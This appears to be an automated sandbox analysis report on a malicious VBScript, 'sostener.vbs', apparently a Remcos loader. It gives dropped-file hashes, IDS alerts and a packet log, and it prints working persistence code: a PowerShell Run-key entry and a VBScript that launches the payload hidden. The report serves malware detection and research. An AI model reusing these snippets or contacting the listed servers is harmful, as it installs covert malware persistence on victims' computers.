                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ziigamrt.ojs.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zv0m5ily.2vy.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zzwnqnqy.rly.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\sostener.vbs

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):449448
                                  Entropy (8bit):3.340780405236786
                                  Encrypted:false
                                  SSDEEP:96:WDT/c7lY88ky0xbFi1msq4VIAGYAjrGzrD5UbF:W3/OlY88kyIhi1msLVIAGYAUvGF
                                  MD5:E260955361DC0C8454FCFA061A45F6F1
                                  SHA1:BB77B8E3EF1C8D30CB5DBB90725D34E3C7602E13
                                  SHA-256:E9CC243923DE94787673438F26C30BAEFE9995B38C8B8047B95726B998BAF26C
                                  SHA-512:2F6572ECF6169A33C4CD273C0A9D8FD158E4E9230BB3C0489F3CA8BD0884C784D2372DCC09A6438F178EC2E8A27CCD37B1DE3771B6A6CC6485D8D220BC3FA202
                                  Malicious:true
                                  Preview:......'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.....'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.........'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.....'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.........'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.....'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.........'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.

                                  C:\Users\user\AppData\Local\Temp\sostener.vbs:Zone.Identifier

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Preview:[ZoneTransfer]....ZoneId=0

                                  C:\Users\user\AppData\Local\Temp\xx1.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):265
                                  Entropy (8bit):5.089796375501315
                                  Encrypted:false
                                  SSDEEP:6:9HUomDuwZH1j0IQHMCsny1xsAuwkn23fTflIcNBeR7n:9HUBVVj0YCsngzpfbflIc3O7n
                                  MD5:FC519A447E37C92CF0674A7C8C6463C7
                                  SHA1:E901EC598A0D20FFC3C0C519AAE2008EB1387A79
                                  SHA-256:4C41BA682C8AC4DEDC245FD9699E4E13D79C44298CCF01F90E615E7779D9F904
                                  SHA-512:294BADFCC831F4B6E5B9BC165606A03C90F605ECA74C0A22303C4DCE11323FB437A4A2721134FA3F87494A2A333CA6833A28828575EAF6D8B1D29DC7B7B8A380
                                  Malicious:true
                                  Preview:$teste = New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "_______________________-------------" -Value "Powershell.exe -WindowStyle hidden ""& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' """ -PropertyType "String" -force; {$teste}

                                  C:\Users\user\AppData\Local\Temp\xx2.vbs

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):178
                                  Entropy (8bit):5.071665462776722
                                  Encrypted:false
                                  SSDEEP:3:jJi0m81GX0HsoduSJJFIf9IMwblAUR1ftLCIAut+kiE2J5xAIUuYLWoj5gWA:jJididMon81x87RBN3Auwkn23f18jCWA
                                  MD5:220F960E7D8D0FBD313F359A40BC5CD8
                                  SHA1:9277DF8E5D0E97DFA131B59146222FC7A95D8EA5
                                  SHA-256:214898F26129096B5771F772A10BA7D42A20F16A6C02CDF4DFE3EFA3C582E6DF
                                  SHA-512:C35E3C23EEDF35F227297C7206973B966F13DB87535B38AAB50007DC8C2E0E1EEC563B0661F8DAAAABCF08E3C1E70B51E8D71C272C0C3CFDCD7AACD09509C19C
                                  Malicious:true
                                  Preview:Set KaHuc = CreateObject("Wscript.shell")..KaHuc.run "powershell -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'" ,0, false

                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7330917840729887
                                  Encrypted:false
                                  SSDEEP:96:rxClD33CxHUekvhkvCCtRgR+wcFHagR+wcuH8:rxqDy0KRgR+agR+x
                                  MD5:A744E2C8B26AA3C8A03A6A5F1ED8A084
                                  SHA1:1FDB6F86E22003BFB4CF65A80300586D793FFDC3
                                  SHA-256:7F3BAD08863DB69A3DCD89C3C1059F2A4E37D12D7621945DAC4CAD78BCD049E5
                                  SHA-512:1A4A3E2D32468CFDBFE92E262DBC94DD59B40C056A786468D76BF991F616C55C100467D81DE44611F6D9B4DB8A1B5A090CF2CEB5629D8B037E93F2C091B51D2D
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...-/.v....0q......z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....Q.f......!..........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^:Y.F...........................%..A.p.p.D.a.t.a...B.V.1.....:Y.F..Roaming.@......CW.^:Y.F..........................;...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^:Y.F..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..........................-...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^:Y.F....Q...........

                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF57b4b2.TMP (copy)

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7330917840729887
                                  Encrypted:false
                                  SSDEEP:96:rxClD33CxHUekvhkvCCtRgR+wcFHagR+wcuH8:rxqDy0KRgR+agR+x
                                  MD5:A744E2C8B26AA3C8A03A6A5F1ED8A084
                                  SHA1:1FDB6F86E22003BFB4CF65A80300586D793FFDC3
                                  SHA-256:7F3BAD08863DB69A3DCD89C3C1059F2A4E37D12D7621945DAC4CAD78BCD049E5
                                  SHA-512:1A4A3E2D32468CFDBFE92E262DBC94DD59B40C056A786468D76BF991F616C55C100467D81DE44611F6D9B4DB8A1B5A090CF2CEB5629D8B037E93F2C091B51D2D
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...-/.v....0q......z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....Q.f......!..........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^:Y.F...........................%..A.p.p.D.a.t.a...B.V.1.....:Y.F..Roaming.@......CW.^:Y.F..........................;...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^:Y.F..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..........................-...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^:Y.F....Q...........

                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CET0BENF6MBIOKFMXJA3.temp

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7330917840729887
                                  Encrypted:false
                                  SSDEEP:96:rxClD33CxHUekvhkvCCtRgR+wcFHagR+wcuH8:rxqDy0KRgR+agR+x
                                  MD5:A744E2C8B26AA3C8A03A6A5F1ED8A084
                                  SHA1:1FDB6F86E22003BFB4CF65A80300586D793FFDC3
                                  SHA-256:7F3BAD08863DB69A3DCD89C3C1059F2A4E37D12D7621945DAC4CAD78BCD049E5
                                  SHA-512:1A4A3E2D32468CFDBFE92E262DBC94DD59B40C056A786468D76BF991F616C55C100467D81DE44611F6D9B4DB8A1B5A090CF2CEB5629D8B037E93F2C091B51D2D
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...-/.v....0q......z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....Q.f......!..........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^:Y.F...........................%..A.p.p.D.a.t.a...B.V.1.....:Y.F..Roaming.@......CW.^:Y.F..........................;...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^:Y.F..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..........................-...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^:Y.F....Q...........

                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NIYB5O5YSJK0Z4IHZ95W.temp

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7309651448541743
                                  Encrypted:false
                                  SSDEEP:96:rOClX33CZwUekvhkvCCtRgR+wcuHagR+wcuH8:rOqXilKRgR+dgR+x
                                  MD5:40FB4482C30FF5A6416950B365DE1DB8
                                  SHA1:63F6155A122B4B337C05729E64CF821694AE3DBC
                                  SHA-256:FE5B3CD4F65BBA98B1266D944ABE9609D4B52DF7F1F2A7884C299681FDEB75B7
                                  SHA-512:BFC06671764FE3419B7BE967822BA7A68BAC3F43F662160A8A288ED56A46E0E7C03F7054EC08D120CEE6F0F42AAB4FF511A5BDBEB46B8EDE3F3B142D3DFFE59C
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...-/.v....0q......z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....Q.f.....(...........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^:Y.F...........................%..A.p.p.D.a.t.a...B.V.1.....:Y.F..Roaming.@......CW.^:Y.F..........................;...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^:Y.F..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^:Y.F..........................-...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^:Y.F....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^:Y.F....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^:Y.F..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^:Y.F....Q...........

                                  Static File Info

                                  General

                                  File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Entropy (8bit):3.340780405236786
                                  TrID:
                                  • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                  • MP3 audio (1001/1) 33.33%
                                  File name:sostener.vbs
                                  File size:449'448 bytes
                                  MD5:e260955361dc0c8454fcfa061a45f6f1
                                  SHA1:bb77b8e3ef1c8d30cb5dbb90725d34e3c7602e13
                                  SHA256:e9cc243923de94787673438f26c30baefe9995b38c8b8047b95726b998baf26c
                                  SHA512:2f6572ecf6169a33c4cd273c0a9d8fd158e4e9230bb3c0489f3ca8bd0884c784d2372dcc09a6438f178ec2e8a27ccd37b1de3771b6a6cc6485d8d220bc3fa202
                                  SSDEEP:96:WDT/c7lY88ky0xbFi1msq4VIAGYAjrGzrD5UbF:W3/OlY88kyIhi1msLVIAGYAUvGF
                                  TLSH:E8A4123D9B42848C95B230478EAA16ACC99613783F8E7FA9836142D0647F739DF5CDE1
                                  File Content Preview:......'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.....'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C

                                  File Icon

                                  Icon Hash:68d69b8f86ab9a86

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-09-26T10:55:10.411734+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44973115.235.85.194443TCP
                                  2024-09-26T10:55:11.212861+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44973215.235.85.194443TCP
                                  2024-09-26T10:55:11.388506+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1115.235.85.194443192.168.2.449732TCP
                                  2024-09-26T10:55:11.388506+02002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1115.235.85.194443192.168.2.449732TCP
                                  2024-09-26T10:55:14.186081+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449733173.208.241.1558888TCP
                                  2024-09-26T10:55:15.283452+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449734178.237.33.5080TCP
                                  2024-09-26T10:55:30.032957+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44974215.235.85.194443TCP
                                  2024-09-26T10:55:30.849070+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44974315.235.85.194443TCP
                                  2024-09-26T10:55:31.026081+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1115.235.85.194443192.168.2.449743TCP
                                  2024-09-26T10:55:31.026081+02002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1115.235.85.194443192.168.2.449743TCP
                                  2024-09-26T10:55:37.895610+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44974515.235.85.194443TCP
                                  2024-09-26T10:55:38.692655+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44974615.235.85.194443TCP
                                  2024-09-26T10:55:38.866932+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1115.235.85.194443192.168.2.449746TCP
                                  2024-09-26T10:55:38.866932+02002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1115.235.85.194443192.168.2.449746TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Sep 26, 2024 10:55:08.990690947 CEST49730443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:08.990726948 CEST4434973015.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:08.990816116 CEST49730443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:09.000133038 CEST49730443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:09.000143051 CEST4434973015.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:09.484273911 CEST4434973015.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:09.484344006 CEST49730443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:09.488344908 CEST49730443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:09.488358021 CEST4434973015.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:09.488760948 CEST4434973015.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:09.500490904 CEST49730443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:09.547405958 CEST4434973015.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:09.627069950 CEST4434973015.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:09.636584044 CEST4434973015.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:09.636609077 CEST4434973015.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:09.636744022 CEST4434973015.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:09.636773109 CEST49730443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:09.636806011 CEST49730443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:09.639601946 CEST49730443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:09.790766954 CEST49731443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:09.790819883 CEST4434973115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:09.791007996 CEST49731443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:09.791286945 CEST49731443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:09.791305065 CEST4434973115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:10.268940926 CEST4434973115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:10.269062996 CEST49731443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:10.270406961 CEST49731443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:10.270421028 CEST4434973115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:10.270925999 CEST4434973115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:10.271728992 CEST49731443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:10.319397926 CEST4434973115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:10.411858082 CEST4434973115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:10.420972109 CEST4434973115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:10.420996904 CEST4434973115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:10.421103001 CEST49731443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:10.421143055 CEST4434973115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:10.421210051 CEST49731443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:10.499772072 CEST4434973115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:10.499831915 CEST4434973115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:10.499892950 CEST49731443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:10.499922991 CEST4434973115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:10.499957085 CEST49731443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:10.499979019 CEST49731443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:10.507863045 CEST4434973115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:10.507947922 CEST4434973115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:10.507965088 CEST49731443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:10.507985115 CEST4434973115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:10.508018017 CEST49731443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:10.508043051 CEST49731443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:10.585284948 CEST4434973115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:10.585371971 CEST49731443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:10.585391998 CEST4434973115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:10.585423946 CEST4434973115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:10.585484028 CEST49731443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:10.585766077 CEST49731443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:10.588675976 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:10.588783026 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:10.588857889 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:10.589631081 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:10.589665890 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.062702894 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.064421892 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.064502954 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.212946892 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.264199972 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.299629927 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.299658060 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.299695015 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.299704075 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.299720049 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.299730062 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.299751043 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.299757957 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.299782991 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.299784899 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.299801111 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.299840927 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.300497055 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.300549030 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.300566912 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.300580025 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.300605059 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.300623894 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.313999891 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.314050913 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.314076900 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.314085007 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.314116955 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.314138889 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.386954069 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.387051105 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.387083054 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.387114048 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.387150049 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.387183905 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.388562918 CEST4434973215.235.85.194192.168.2.4
